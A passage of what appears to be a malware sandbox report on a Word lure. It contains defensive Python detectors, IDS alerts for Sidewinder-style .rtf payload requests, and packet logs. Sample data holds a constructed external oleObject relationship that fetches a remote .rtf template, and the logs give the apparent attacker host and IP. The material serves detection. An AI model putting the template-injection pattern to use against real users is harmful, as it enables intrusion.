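    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.org/" TargetMode="External"/>'
    '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://remote.example/template.rtf" TargetMode="External"/>'
    '</Relationships>'
)


def scan_sample() -> list:
    """Scan the constructed document; returns the two external relationships."""
    return external_relationships(build_docx(SAMPLE_RELS))


if __name__ == "__main__":
    for f in scan_sample():
        print("[%s] %s %s %s -> %s" % ("HIGH" if f["high_risk"] else "info",
                                       f["part"], f["id"], f["type"], f["target"]))
```

Run it against a real document with `external_relationships(open(path, "rb").read())`. The check deliberately walks every `.rels` part rather than only `word/_rels/document.xml.rels`, because the external link can just as well hang off `word/_rels/settings.xml.rels` (attached template) or a header, footer or embedded part.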


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-19T02:44:40.837742+0200 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.4 | 49719 | 91.218.228.26 | 80 | TCP
2025-04-19T02:44:43.229507+0200 | 2800029 | ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass | 1 | 91.218.228.26 | 80 | 192.168.2.4 | 49726 | TCP
2025-04-19T02:44:45.155817+0200 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.4 | 49731 | 91.218.228.26 | 80 | TCP
2025-04-19T02:44:46.343974+0200 | 2055080 | ET MALWARE TA399/Sidewinder Activity Payload Request M3, Microsoft Word UA Request for .rtf | 1 | 192.168.2.4 | 49734 | 91.218.228.26 | 80 | TCP
2025-04-19T02:44:47.340125+0200 | 2033858 | ET MALWARE TA399/Sidewinder Activity Payload Request M2, Microsoft Office UA Request for .rtf | 1 | 192.168.2.4 | 49735 | 91.218.228.26 | 80 | TCP
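The alerts above name two request shapes: an OPTIONS probe sent by an Office user agent (the WebDAV discovery Word performs before opening a remote document, offering NTLM and Negotiate authentication to whatever host is named) and an Office user agent fetching an .rtf. The Python below is an added example, not part of the report and not the Joe Security or Emerging Threats rule bodies; it approximates what the signature names describe, using only the request line and headers. Its first sample request reproduces the headers of the OPTIONS request recorded in the HTTP session further down; the GET requests, their host `remote.example` and path `/template.rtf` are constructed for the example.

```python
"""Tag raw HTTP requests for the two Office behaviours the alerts describe.

Added example; an approximation of the signature names, not the vendors' rules.
The OPTIONS request mirrors the one captured in the sandbox session; the GET
requests and every host and path in them are constructed.
"""
import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    target: str
    headers: dict = field(default_factory=dict)   # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse an HTTP/1.x request head: request line plus headers up to the blank line."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method.upper(), target, headers)


# Office products identify themselves this way; Word 16 sends "Microsoft Office Word 2014".
OFFICE_UA = re.compile(r"^Microsoft (Office|Word|Excel|PowerPoint)\b", re.I)


def classify(req: HttpRequest) -> list:
    """Return the tags that apply to one request (empty list means nothing of note)."""
    tags = []
    ua = req.headers.get("user-agent", "")
    office_client = bool(OFFICE_UA.search(ua)) or "x-office-major-version" in req.headers

    # Office opens a remote document by first probing the URL with OPTIONS and
    # advertising the auth schemes it accepts; to a host outside the corporate
    # estate that is the WebDAV discovery the first alert is named after, and an
    # Accept-Auth list containing NTLM/Negotiate means credentials may follow.
    if req.method == "OPTIONS" and office_client:
        tags.append("office-webdav-discovery")
        if re.search(r"\b(NTLM|Negotiate)\b", req.headers.get("accept-auth", ""), re.I):
            tags.append("offers-ntlm-auth")

    # Office itself fetching an .rtf over HTTP is the payload-request pattern
    # the Sidewinder alerts describe; a browser fetching the same path is not.
    path = req.target.split("?", 1)[0]
    if req.method == "GET" and office_client and path.lower().endswith(".rtf"):
        tags.append("office-ua-rtf-fetch")
    return tags


# Reproduces the headers of the OPTIONS request captured in the session below.
OPTIONS_REQ = """OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: clack.su
"""

# Constructed: the kind of follow-up GET the ET alerts describe (host and path hypothetical).
RTF_GET_REQ = """GET /template.rtf HTTP/1.1
User-Agent: Microsoft Office Word 2014
Host: remote.example
"""

# Constructed control: a browser fetching the same file must not be tagged.
BROWSER_GET_REQ = """GET /template.rtf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Host: remote.example
"""


def classify_samples() -> dict:
    """Classify the three sample requests; keyed by sample name."""
    samples = [("options", OPTIONS_REQ), ("rtf_get", RTF_GET_REQ), ("browser_get", BROWSER_GET_REQ)]
    return {name: classify(parse_request(raw)) for name, raw in samples}


if __name__ == "__main__":
    for name, tags in classify_samples().items():
        print("%-12s %s" % (name, ", ".join(tags) or "-"))
```

In a proxy or IDS context the discriminating element is the combination of an Office user agent with a host that is not an internal SharePoint/WebDAV endpoint; the OPTIONS request alone is normal Office behaviour, so pair the tag with an allow-list of the document servers your users legitimately open files from.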
        • Total Packets: 113
        • 80 (HTTP)
        • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2025 02:44:38.633733034 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.010466099 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.011039019 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.011279106 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.387878895 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876626968 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876643896 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876655102 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876708031 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.876727104 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876739025 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876749992 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876760960 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.876773119 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.876780033 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.913635015 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:39.921441078 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.921463966 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:39.921523094 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.075665951 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.244064093 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.244174957 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.253591061 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253611088 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253624916 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253638983 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253648043 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253653049 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.253662109 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253679037 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253684044 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.253695011 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253701925 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.253710032 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253725052 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.253734112 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.253758907 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.253782988 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.264323950 CEST | 80 | 49716 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.264379978 CEST | 49716 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.308156013 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.308229923 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.308360100 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.540925980 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837677956 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837697029 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837713003 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837728024 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837742090 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.837755919 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.837770939 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837781906 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.837795019 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837810040 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.837820053 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.837836027 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.837863922 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.851665020 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.851686954 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.871555090 CEST | 49724 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.878360987 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.878379107 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:40.878407001 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:40.878421068 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.070095062 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.070116043 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.070149899 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.070162058 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.070175886 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.070213079 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.070233107 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.070247889 CEST | 80 | 49719 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.070276976 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.070343971 CEST | 49719 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.248621941 CEST | 80 | 49724 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.248723030 CEST | 49724 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.249003887 CEST | 49724 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.626068115 CEST | 80 | 49724 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.626091003 CEST | 80 | 49724 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:41.672148943 CEST | 49724 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:41.694412947 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.066442013 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.066740990 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.066957951 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.438878059 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439097881 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439110994 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439124107 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439184904 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.439194918 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439208031 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439218044 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439229012 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439233065 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.439239979 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439245939 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439256907 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.439265013 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.439306021 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.439306021 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.811322927 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811341047 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811352015 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811378956 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811388969 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811399937 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811410904 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811423063 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811434031 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811444998 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811455965 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811472893 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:42.811481953 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.811481953 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.811518908 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.811518908 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:42.857609987 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:43.229506969 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:43.229576111 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:43.389374018 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:43.620464087 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:43.620543003 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:43.620726109 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:43.851835012 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100126982 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100192070 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100238085 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.100279093 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100291967 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100311995 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100327015 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100349903 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.100351095 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.100379944 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.101605892 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.105494976 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.199604988 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.199678898 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.199687004 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.199738026 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.225159883 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.225209951 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.331327915 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.331373930 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.331374884 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.331407070 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.331413984 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.331423044 CEST | 80 | 49730 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.331445932 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.331461906 CEST | 49730 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.488872051 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:44.488961935 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.489150047 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:44.872569084 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.155724049 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.155778885 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.155817032 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.155826092 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.155875921 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.155915022 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.155915022 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.155936956 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.155973911 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.155983925 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.156048059 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.156079054 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.156893015 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.168044090 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.168219090 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.170644045 CEST | 49734 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.242647886 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.242692947 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.242742062 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.242790937 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.262331009 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.262389898 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.539453030 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.539482117 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.539509058 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.539511919 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.539540052 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.539550066 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.539566040 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.539589882 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.547000885 CEST | 80 | 49734 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.547107935 CEST | 49734 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.547377110 CEST | 49734 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.551435947 CEST | 80 | 49731 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:45.551480055 CEST | 49731 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:45.923831940 CEST | 80 | 49734 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:46.295002937 CEST | 80 | 49734 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:46.300976038 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:46.343974113 CEST | 49734 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:46.680351019 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:46.680495024 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:46.680639982 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.059813023 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.339966059 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.339998007 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.340028048 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.340125084 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.340125084 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.351562977 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.351562977 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.369962931 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.370126009 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.370465040 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.370488882 CEST | 80 | 49735 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.370527029 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.370651960 CEST | 49735 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.614042044 CEST | 80 | 49724 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:47.614109993 CEST | 49724 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:47.680000067 CEST | 49724 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:48.057131052 CEST | 80 | 49724 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:49.414531946 CEST | 80 | 49726 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:49.414608002 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:52.926661015 CEST | 80 | 49734 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:44:52.939002037 CEST | 49734 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:52.940320015 CEST | 49734 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:44:53.316687107 CEST | 80 | 49734 | 91.218.228.26 | 192.168.2.4
Apr 19, 2025 02:46:24.087412119 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:46:24.868294001 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:46:26.433728933 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:46:29.540301085 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:46:35.758924007 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Apr 19, 2025 02:46:48.180716991 CEST | 49726 | 80 | 192.168.2.4 | 91.218.228.26
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2025 02:44:37.594063997 CEST | 62728 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2025 02:44:38.594216108 CEST | 62728 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2025 02:44:38.631468058 CEST | 53 | 62728 | 1.1.1.1 | 192.168.2.4
Apr 19, 2025 02:44:38.699384928 CEST | 53 | 62728 | 1.1.1.1 | 192.168.2.4
Apr 19, 2025 02:44:42.977391958 CEST | 57742 | 53 | 192.168.2.4 | 1.1.1.1
Apr 19, 2025 02:44:43.388605118 CEST | 53 | 57742 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
